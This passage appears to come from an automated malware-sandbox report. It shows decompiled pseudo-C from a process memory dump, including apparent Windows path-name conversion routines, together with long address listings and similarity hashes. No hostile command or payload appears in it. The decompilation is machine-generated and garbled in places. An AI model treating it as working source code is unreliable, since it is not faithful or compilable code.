							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0103D130(_t427, _t494, _t511);
				}
			}

0x010b5ba5
0x010b5baa
0x010b5baf
0x010b5bb4
0x010b5bb6
0x010b5bbc
0x010b5bbe
0x010b5bc4
0x010b5bcd
0x010b5bd3
0x010b5bd6
0x010b5bdc
0x010b5be0
0x010b5be3
0x010b5beb
0x010b5bf2
0x010b5bf8
0x010b5bfe
0x010b5c04
0x010b5c0e
0x010b5c18
0x010b5c1f
0x010b5c25
0x010b5c2a
0x010b5c2c
0x010b5c32
0x010b5c3a
0x010b5c3f
0x010b5c42
0x010b5c48
0x010b5c5b
0x010b5c5b
0x010b5c2c
0x010b5cb7
0x010b5cb9
0x010b5cbf
0x010b5cc2
0x010b5cca
0x010b5ccb
0x010b5ccb
0x010b5cd1
0x010b5cd7
0x010b5cda
0x010b5ce1
0x010b5ce4
0x010b5ce7
0x010b5ced
0x010b5cf3
0x010b5cf9
0x010b5cff
0x010b5d08
0x010b5d0a
0x010b5d0e
0x010b5d10
0x00000000
0x00000000
0x010b5d16
0x010b5d1a
0x00000000
0x00000000
0x010b5d20
0x010b5d22
0x010b5d25
0x010b5d2f
0x010b5d2f
0x010b5d33
0x010b5d3d
0x010b5d49
0x010b5d4b
0x00000000
0x00000000
0x010b5d5a
0x010b5d5d
0x010b5d60
0x00000000
0x00000000
0x010b5d66
0x010b5d69
0x00000000
0x00000000
0x010b5d6f
0x010b5d6f
0x010b5d73
0x010b5d79
0x010b5d7f
0x010b5d86
0x010b5d95
0x010b5d98
0x010b5dba
0x010b5dcb
0x010b5dce
0x010b5dd3
0x010b5dd6
0x010b5dd8
0x010b5de6
0x010b5dec
0x010b5dee
0x010b5df1
0x010b5df3
0x010b635a
0x010b635a
0x00000000
0x010b635a
0x010b5dfe
0x010b5e02
0x010b5e05
0x010b5e07
0x010b5e10
0x010b5e13
0x010b5e1b
0x010b5e1c
0x010b5e21
0x010b5e22
0x010b5e23
0x010b5e25
0x010b5e2a
0x010b5e2c
0x010b5e2e
0x010b5e36
0x010b5e39
0x010b5e42
0x010b5e47
0x010b5e4d
0x010b5e54
0x010b5e54
0x010b5e54
0x010b5e2e
0x010b5e5c
0x010b5e5f
0x010b5e62
0x010b5e64
0x010b5e6b
0x010b5e70
0x010b5e7a
0x010b5e7a
0x010b5e7a
0x010b5e6b
0x010b5e7e
0x010b5e7f
0x010b5e7f
0x010b5e81
0x010b5e87
0x010b5e8b
0x010b5e8c
0x010b5e8c
0x010b5e8c
0x010b5e9a
0x010b5e9c
0x010b5ea2
0x010b5ea6
0x010b5f50
0x010b5f50
0x010b5f57
0x010b5f66
0x010b5f66
0x010b5f66
0x010b5f68
0x010b5f6a
0x010b63d0
0x00000000
0x010b5f70
0x010b5f70
0x010b5f91
0x010b5f9c
0x010b5f9e
0x010b5fa4
0x010b5fa6
0x010b638c
0x010b6392
0x010b63a1
0x010b63a7
0x010b63af
0x010b63af
0x010b63bd
0x010b63d8
0x00000000
0x010b63d8
0x010b5fac
0x010b5fb2
0x010b5fb4
0x010b5fbd
0x010b5fc6
0x010b5fce
0x010b5fd4
0x010b5fdc
0x010b5fec
0x010b5fed
0x010b5fee
0x010b5fef
0x010b5ff9
0x010b5ffa
0x010b5ffb
0x010b5ffc
0x010b6000
0x010b6004
0x010b6012
0x010b6012
0x010b6018
0x010b6019
0x010b601a
0x010b601b
0x010b601c
0x010b6020
0x010b6059
0x010b605c
0x010b6061
0x010b6061
0x010b6022
0x010b6022
0x010b6022
0x010b6025
0x010b602a
0x010b602b
0x010b6031
0x010b6037
0x010b6038
0x010b603e
0x010b6048
0x010b6049
0x010b604a
0x010b604b
0x010b604c
0x010b604d
0x010b6053
0x010b6054
0x010b6054
0x010b6062
0x010b6065
0x010b6067
0x010b606a
0x010b6070
0x010b6075
0x010b6076
0x010b6081
0x010b6087
0x010b6095
0x010b6099
0x010b609e
0x010b60a4
0x010b60ae
0x010b60b0
0x010b60b3
0x010b60b6
0x010b60b8
0x010b60ba
0x010b60ba
0x010b60ba
0x010b60ba
0x010b60be
0x010b60c0
0x010b60c5
0x010b60c5
0x010b60c5
0x010b60c6
0x010b60cd
0x010b6114
0x010b60cf
0x010b60cf
0x010b60d4
0x010b60d5
0x010b60da
0x010b60db
0x010b60e1
0x010b60e2
0x010b60e8
0x010b60f8
0x010b60fd
0x010b60fe
0x010b6102
0x010b6104
0x010b6107
0x010b6109
0x010b610b
0x010b610b
0x010b610b
0x010b610b
0x010b610f
0x010b610f
0x010b6117
0x010b611a
0x010b611f
0x010b6125
0x010b6134
0x010b6139
0x010b613f
0x010b6146
0x010b6148
0x010b614b
0x010b614d
0x010b614f
0x010b614f
0x010b614f
0x010b614f
0x010b6153
0x010b6159
0x010b6159
0x010b615c
0x010b6163
0x010b6169
0x010b616c
0x010b6172
0x010b6181
0x010b6186
0x010b6187
0x010b618b
0x010b6191
0x010b6195
0x010b61a3
0x010b61bb
0x010b61c0
0x010b61c3
0x010b61cc
0x010b61d0
0x010b61dc
0x010b61de
0x010b61e1
0x010b61e4
0x010b61e6
0x010b61e8
0x010b61e8
0x010b61e8
0x010b61e8
0x010b61e6
0x010b61ec
0x010b61f3
0x010b6203
0x010b6209
0x010b620a
0x010b6216
0x010b621d
0x010b6227
0x010b6241
0x010b6246
0x010b624c
0x010b6257
0x010b6259
0x010b625c
0x010b625e
0x010b6260
0x010b6260
0x010b6260
0x010b6260
0x010b625e
0x010b6264
0x010b6267
0x010b6269
0x010b6315
0x010b6315
0x010b631b
0x010b631e
0x010b6324
0x010b6327
0x010b632f
0x010b6330
0x010b6333
0x010b633a
0x010b633c
0x010b6335
0x010b6335
0x010b6335
0x010b633f
0x010b6342
0x010b634c
0x010b6352
0x010b6355
0x010b6355
0x010b6359
0x00000000
0x010b626f
0x010b6275
0x010b6275
0x010b6278
0x010b627e
0x010b627e
0x010b6281
0x010b6287
0x010b628d
0x010b6298
0x010b629c
0x010b62a2
0x010b629e
0x010b629e
0x010b629e
0x010b62a7
0x010b62a7
0x010b62aa
0x010b62b0
0x010b62f0
0x010b62f0
0x010b62f2
0x010b62f8
0x010b62fd
0x010b62b2
0x010b62b2
0x010b62b2
0x010b62b5
0x010b62dd
0x010b62e2
0x010b62e5
0x010b62b7
0x010b62b8
0x010b62bb
0x010b62bd
0x010b62c0
0x010b62c4
0x010b62cd
0x010b62cd
0x010b62c0
0x010b62bb
0x010b62b5
0x010b6302
0x010b6303
0x010b6305
0x010b6305
0x010b6305
0x010b630c
0x010b630c
0x00000000
0x010b627e
0x010b6269
0x010b5eac
0x010b5ebb
0x010b5ebe
0x010b5ecb
0x010b5ecb
0x010b5ece
0x010b5ece
0x010b5ed4
0x010b5ed7
0x010b5ed9
0x010b5edb
0x010b5edb
0x010b5ee1
0x010b5ee1
0x010b5ee3
0x010b5f20
0x010b5f20
0x010b5ee5
0x010b5ee5
0x010b5ee5
0x010b5ee8
0x010b5f11
0x010b5f18
0x010b5eea
0x010b5eea
0x010b5eed
0x010b5ef2
0x010b5ef8
0x010b5efb
0x010b5f0a
0x010b5f0a
0x010b5eed
0x010b5ee8
0x010b5f22
0x010b5f28
0x00000000
0x00000000
0x010b5f30
0x010b5f31
0x010b5f37
0x010b5f3a
0x010b5f3d
0x010b5f44
0x00000000
0x00000000
0x00000000
0x010b5f46
0x010b5f48
0x010b5f4d
0x00000000
0x010b5f4d
0x010b5dda
0x010b5ddf
0x00000000
0x010b5ddf
0x010b5dd8
0x010b5da7
0x010b5da9
0x010b5dac
0x010b5dae
0x00000000
0x010b5db4
0x010b5db4
0x00000000
0x010b5db4
0x010b5dae
0x010b5d88
0x010b5d8d
0x010b6363
0x010b6369
0x010b636a
0x010b6370
0x010b6372
0x010b637a
0x010b637b
0x010b637d
0x00000000
0x00000000
0x010b637f
0x010b6385
0x00000000
0x010b6385
0x010b5d38
0x010b5d3b
0x00000000
0x00000000
0x00000000
0x010b5d3b
0x010b5d27
0x010b5d29
0x00000000
0x00000000
0x00000000
0x010b6360
0x00000000
0x010b6360
0x010b5c10
0x010b5c10
0x010b63da
0x010b63e5
0x010b63e5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
Instruction ID: bbdfdef7dd33e46af40618fbcafff32cf3e695039f872339ba39271305e0eed4
Opcode Fuzzy Hash: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
Instruction Fuzzy Hash: CF42487590122A8FDB64CF68C880BE9BBF1FF49704F1481EAD98DAB242D7359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01004120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01004120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x10dd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0101F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01006E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01004620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01006E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M010045F8))) {
												case 0:
													_v568 = 0xfc1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xfc11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01004620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0102F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0102F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00FE52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00FFEB70(1, 0x10d79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00FFAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E010295D0();
																			L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0102B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01023D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0102B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01004128
0x01004135
0x0100413c
0x01004141
0x01004145
0x01004147
0x0100414e
0x01004151
0x01004159
0x0100415c
0x01004160
0x01004164
0x01004168
0x0100416c
0x0100417f
0x01004181
0x0100446a
0x0100446a
0x0100418c
0x01004195
0x01004199
0x01004432
0x01004439
0x0100443d
0x01004442
0x01004447
0x00000000
0x0100419f
0x010041a3
0x010041b1
0x010041b9
0x010041bd
0x010045db
0x010045db
0x00000000
0x010041c3
0x010041c3
0x010041ce
0x010041d4
0x0104e138
0x0104e13e
0x0104e169
0x0104e16d
0x0104e19e
0x0104e16f
0x0104e16f
0x0104e175
0x0104e179
0x0104e18f
0x0104e193
0x00000000
0x0104e199
0x00000000
0x0104e199
0x0104e193
0x00000000
0x00000000
0x00000000
0x010041da
0x010041da
0x010041df
0x010041e4
0x010041ec
0x01004203
0x01004207
0x0104e1fd
0x01004222
0x01004226
0x0104e1f3
0x0104e1f3
0x0100422c
0x0100422c
0x01004233
0x0104e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01004239
0x01004239
0x01004239
0x01004239
0x01004233
0x01004226
0x010041ee
0x010041ee
0x010041f4
0x01004575
0x0104e1b1
0x0104e1b1
0x00000000
0x0100457b
0x0100457b
0x01004582
0x0104e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01004588
0x01004588
0x0100458c
0x0104e1c4
0x0104e1c4
0x00000000
0x01004592
0x01004592
0x01004599
0x0104e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0100459f
0x0100459f
0x010045a3
0x0104e1d7
0x0104e1e4
0x00000000
0x010045a9
0x010045a9
0x010045b0
0x0104e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x010045b6
0x010045b6
0x010045b6
0x00000000
0x010045b6
0x010045b0
0x010045a3
0x01004599
0x0100458c
0x01004582
0x00000000
0x00000000
0x00000000
0x00000000
0x010041f4
0x0100423e
0x01004241
0x010045c0
0x010045c4
0x00000000
0x010045ca
0x010045ca
0x00000000
0x0104e207
0x0104e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x010045d1
0x00000000
0x00000000
0x010045ca
0x00000000
0x01004247
0x01004247
0x01004247
0x01004249
0x01004249
0x01004249
0x01004251
0x01004251
0x01004257
0x0100425f
0x0100426e
0x01004270
0x0100427a
0x0104e219
0x0104e219
0x01004280
0x01004282
0x01004456
0x010045ea
0x00000000
0x010045f0
0x0104e223
0x00000000
0x0104e223
0x0100445c
0x0100445c
0x00000000
0x0100445c
0x00000000
0x01004288
0x0100428c
0x0104e298
0x01004292
0x01004292
0x0100429e
0x010042a3
0x010042a7
0x010042ac
0x0104e22d
0x010042b2
0x010042b2
0x010042b9
0x010042bc
0x010042c2
0x010042ca
0x010042cd
0x010042cd
0x010042d4
0x0100433f
0x0100433f
0x010042d6
0x010042d6
0x010042d9
0x010042dd
0x010042eb
0x0104e23a
0x010042f1
0x01004305
0x0100430d
0x01004315
0x01004318
0x0100431f
0x01004322
0x0100432e
0x0100433b
0x0100433b
0x00000000
0x0100432e
0x010042eb
0x0100434c
0x0100434e
0x01004352
0x01004359
0x0100435e
0x01004361
0x0100436e
0x0100438a
0x0100438e
0x01004396
0x0100439e
0x010043a1
0x010043ad
0x010043bb
0x010043bb
0x010043ad
0x0100436e
0x010043bf
0x010043c5
0x01004463
0x01004463
0x010043ce
0x010043d5
0x010043d9
0x010043df
0x01004475
0x01004479
0x01004491
0x01004491
0x01004479
0x010043e5
0x010043eb
0x010043f4
0x010043f6
0x010043f9
0x010043fc
0x010043ff
0x010044e8
0x010044ed
0x010044f3
0x0104e247
0x00000000
0x010044f9
0x01004504
0x01004508
0x0100450f
0x0104e269
0x00000000
0x01004515
0x01004519
0x01004531
0x01004534
0x01004537
0x0100453e
0x01004541
0x0100454a
0x0104e255
0x0104e255
0x0104e25b
0x0104e25e
0x0104e261
0x0104e261
0x01004555
0x01004559
0x0100455d
0x0104e26d
0x0104e270
0x0104e274
0x0104e27a
0x0104e27d
0x0104e28e
0x0104e28e
0x01004563
0x01004563
0x01004569
0x01004569
0x00000000
0x0100455d
0x0100450f
0x00000000
0x010044f3
0x010043ff
0x01004405
0x01004405
0x01004405
0x010042ac
0x0100428c
0x01004282
0x01004407
0x0100440d
0x0104e2af
0x0104e2af
0x01004413
0x01004413
0x00000000
0x010041d4
0x00000000
0x010041c3
0x010041bd
0x01004415
0x01004415
0x01004416
0x01004417
0x01004429
0x0100416e
0x0100416e
0x01004175
0x01004498
0x0100449f
0x0104e12d
0x00000000
0x0104e133
0x00000000
0x0104e133
0x010044a5
0x010044a5
0x010044aa
0x00000000
0x010044bb
0x010044ca
0x010044d6
0x010044d7
0x010044d8
0x010044e3
0x010044e3
0x010044aa
0x0100417b
0x0100417b
0x0100417b
0x00000000
0x0100417b
0x01004175
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
Instruction ID: 145932e766d84c0b6bf606a46736bbb711e624f2dd80aa0cdc7229e9d1058075
Opcode Fuzzy Hash: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
Instruction Fuzzy Hash: 8AF18D706082118FE765CF19C480A7AB7E1FF88714F45896EFAC6CB291E738D981CB56

Uniqueness

Uniqueness Score: -1.00%

Function 010120A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E010120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x10d8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01012EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01012EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00FE58EC(_t240);
									_t221 =  *0x10d5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x10d5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01024A2C(0x10d6e40, 0x1024b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
